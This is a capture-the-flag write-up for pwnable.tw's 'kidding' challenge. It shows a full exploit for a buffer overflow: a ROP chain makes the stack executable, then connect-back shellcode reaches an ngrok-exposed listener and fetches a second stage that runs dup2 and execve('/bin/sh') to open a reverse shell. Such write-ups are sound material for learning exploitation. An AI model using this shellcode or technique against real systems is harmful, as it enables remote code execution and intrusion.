Original challenge link: https://pwnable.tw/challenge/#16
You can as well download file here: kidding.zip
There will be 1 file in zip:
- kidding
First, let's check the basic information of file:
$ file kidding
kidding: ELF 32-bit LSB executable, Intel 80386, version 1 (GNU/Linux), statically linked, for GNU/Linux 2.6.32, BuildID[sha1]=17d38985f3a41f2ffb821c3ac7dfd0547522cc18, not stripped
$ checksec kidding
Arch: i386-32-little
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
This is a 32-bit binary without being stripped and it's statically linked, which means it can run without libc. Next, let's decompile the binary with ghidra to get the flow.
There is just 1 function main which reads 100 bytes from user and then closes all the file descriptor 0, 1 and 2:
So we just have a bug Buffer Overflow
For challenges like this one, statically linked with Buffer Overflow, we will have a function called _dl_make_stack_executable
which will run mprotect for us. That was a new thing for me.
Using ghidra, we can get the pseudocode of _dl_make_stack_executable
So if we can modify __stack_prot
into 7
which means rwx
, we can set the current stack to be executable. The variable __libc_stack_end
will contains the end of stack which will be &
with _dl_pagesize
, which contains 0x1000
We can get those address easily because of No PIE
. Hence, modify __stack_prot
would not be a difficult work.
Let's assume that we can execute shellcode now. The next thing we want is to reopen stdin, stdout and stderr. I tried with the technique here but failed when exploit locally. So I ask for advice from teammate and he tell me that I should use socket instead.
After searching for challenge which use socket, I ended up with this blog. I see that he write the c code of socket and connect so I get the sample code from geeksforgeeks
here and compile it.
And from this challenge, I know that SYS_SOCKET just create an endpoint, we cannot interact, read or write from the fd returned by SYS_SOCKET immediately. We need to execute SYS_CONNECT to establish a real connection and then, we can read and write to the fd returned by SYS_SOCKET.
We can SYS_CONNECT to our host via ngrok or we can create 1 bind socket and 1 socket to connect to that bind on server. For this writeup, we will use the first way, connect back to our host via ngrok. And with that new connection, we will send the second payload to make the binary execute dup2 and create shell for us.
- Stage 1: Create socket and connect
- Stage 2: Second payload & get shell
First, we will need to modify __stack_prot
to 7
so some gadgets will be needed:
pop_eax = 0x080b8536
pop_edx = 0x0806ec8b
mov__eax_4__edx = 0x08053502
jmp_esp = 0x080bd13b
And we also need the global variable addresses which are used in _dl_make_stack_executable
__libc_stack_end = 0x80e9fc8
_dl_pagesize = 0x80eaa08
__stack_prot = 0x80e9fec
_dl_make_stack_executable = 0x0809a080
You can use gdb or ghidra or ida to find these addresses.
So now, let's change value of __stack_prot
first, then move the address of __libc_stack_end
to eax, which is first argument of function _dl_make_stack_executable
, and finally, execute that function:
payload = flat(
0, 0, 0, # Padding to saved eip
# Set __stack_prot = 7
pop_eax, __stack_prot - 4,
pop_edx, 7,
# Set arg1 = __libc_stack_end
pop_eax, __libc_stack_end,
After that function, we can see that the esp is currently in rwx range. This is output from vmmap
And this is our current stack address:
So if we jmp esp
, we can execute our shellcode right after that so we add jmp esp
gadget after we called _dl_make_stack_executable
. Due to the limited input, our shellcode must be as short as possible.
As idea above, we will create a socket endpoint. Compile and debug with the source from geeksforgeeks
here to know what argument we need when execute socket function and connect function.
For the socket call, the arguments will be 2, 1 and 0:
Those argument is corresponding to this line socket(AF_INET, SOCK_STREAM, 0)
Next, look at the connect function:
serv_addr.sin_family = AF_INET;
serv_addr.sin_port = htons(8080);
inet_pton(AF_INET, "", &serv_addr.sin_addr)
connect(sock, (struct sockaddr*)&serv_addr, sizeof(serv_addr))
There is a parameter serv_addr
which is a structure (you can read it here) but we don't want to view source here so just debug with gdb to see how it is placed.
The variable serv_addr.sin_family
will contain number 2 of course because it is defined in source. Next, the function htons()
will swap 2 bytes of port. With the port above is 8080
which in hex is 0x1f90
, htons(0x1f90)
has output is 0x901f
, 2 bytes swapped with each other:
This is before htons
After htons
So sin_family
and sin_port
is not our problem now. The only problem is sin_addr
. Debug before and after the execution of function inet_pton
with address
and we can see the sin_addr
Before inet_pton
After inet_pton
Look at the result, we can conclude as following:
>>> hex(127)
>>> hex(0)
>>> hex(1)
>>> 127 . 0 . 0 . 1
>>> 7f 00 00 01
>>> # = 0x7f000001
>>> u32(p32(0x7f000001)[::-1])
That means it will swap all 4 byte from 0x7f000001
into 0x0100007f
and assign to sin_addr
. Everything is clear now. Let's first make a endpoint socket with the shellcode below:
shellcode = asm(
sub sp, 0x200
push eax
push 1
push 2
mov al, 0x66 # SYS_SOCKETCALL
push 1
pop ebx # SYS_SOCKET
mov ecx, esp
int 0x80
''', arch='i386', os='linux')
socketcall can be found here: https://man7.org/linux/man-pages/man2/socketcall.2.html
Then, we need to open 2 terminal, one terminal run the netcat command: nc -lnvp 54321
, one run ngrok command ngrok tcp 54321
and the address which we can access outside of LAN is at the line Forwarding
of ngrok:
To get the ip address of 0.tcp.ngrok.io
, we just simply ping that hostname:
So we have ip address and port now. Let's continue building our shellcode:
host = args.HOST.split('.')
port = int(args.PORT)
host = u32(b''.join([p8(int(k)) for k in host]))
port = (u16(p16(port)[::-1]) << 16) | 2
shellcode = asm(
sub sp, 0x200
push eax
push 1
push 2
mov al, 0x66 # SYS_SOCKETCALL
push 1
pop ebx # SYS_SOCKET
mov ecx, esp # [2, 1, 0]
int 0x80
''' +
f'push {host}\n' +
f'push {port}\n' +
mov ecx, esp # serv_addr: [2, port, host]
push 0x10
push ecx
push 0
mov al, 0x66 # SYS_SOCKETCALL
mov bl, 3 # SYS_CONNECT
mov ecx, esp # [0, serv_addr, 0X10]
int 0x80
So now let's send our payload and shellcode together and see if our netcat has connection or not:
p.send(payload + shellcode)
We get EOF in our solve script:
But we also get unknown connection to our netcat:
That means we connected successfully. Now, we will want to send payload again but our shellcode is too long now, we have only a few bytes left for reading input and jump esp again. Let's run the script again and attach with gdb to check for stack and register right after we have executed SYS_CONNECT:
Because we want to do a read so ebx need to be set to fd returned from SYS_SOCKET, which is 0
. The next register ecx is set correctly with the stack address, we will need to set register edx to a number too. By looking at the stack, we can see that we can easily set ebx to null and edx to a number with pop ebx
and then pop edx
. After we get new shellcode, just simply jump again to esp to continue second stage execution:
shellcode = asm(
sub sp, 0x200
push eax
push 1
push 2
mov al, 0x66 # SYS_SOCKETCALL
push 1
pop ebx # SYS_SOCKET
mov ecx, esp # [2, 1, 0]
int 0x80
''' +
f'push {host}\n' +
f'push {port}\n' +
mov ecx, esp # serv_addr: [2, port, host]
push 0x10
push ecx
push 0
mov al, 0x66 # SYS_SOCKETCALL
mov bl, 3 # SYS_CONNECT
mov ecx, esp # [0, serv_addr, 0X10]
int 0x80
mov al, 3
pop ebx
pop edx
int 0x80
jmp esp
''', arch='i386', os='linux')
Running locally and attach with gdb to debug our shellcode to check if we can read the second stage shellcode or not. Start a new netcat and ngrok (if you have closed), then run the binary with gdb attach. The SYS_CONNECT executed successfully so our netcat has connection now:
Keep going with the shellcode and execute SYS_READ, we can see it's waiting for input from netcat. Let's type AAAABBBBCCCCDDDD
and check in gdb, we can see our buffer (in ecx) changed. This is before we input:
And this is after we input that string:
We can also see the current stack is overwriten now:
It is overwriten with string CCCCDDDD
so offset from the buffer to current stack is 8. Let's move to the next stage!
Now, we have the ability to control our program. Just craft a small or large shellcode and we still can execute that. The idea for this stage is that we will execute dup2(<socket-fd>, 1)
and dup2(<socket-fd>, 2)
to reopen stdout and stderr. After that, just simply create a shell and we can easily get the flag.
Let's create another script and execute netcat command:
from pwn import *
p = process(['nc', '-lnvp', '54321'])
And now, our shellcode would be like this:
payload = b'A'*8
payload += asm(
add esp, 0x200
### dup2(<socket-fd>, 1) ###
mov eax, 0x3f
mov ebx, 0
mov ecx, 1
int 0x80
### dup2(<socket-fd>, 2) ###
mov eax, 0x3f
mov ebx, 0
mov ecx, 2
int 0x80
### execve("/bin/sh", 0, 0) ###
push 6845231
push 1852400175
mov eax, 0xb
mov ebx, esp
xor ecx, ecx
xor edx, edx
int 0x80
''', arch='i386', os='linux')
p.sendafter(b'connect to', payload)
Execute this netcat script first and start ngrok at port 54321, then execute the solve script and we can get the shell.
Full code:
- Solve script: solve.py
- Netcat script: solve_nc.py
Sharing flag is not good so I will keep it secret here.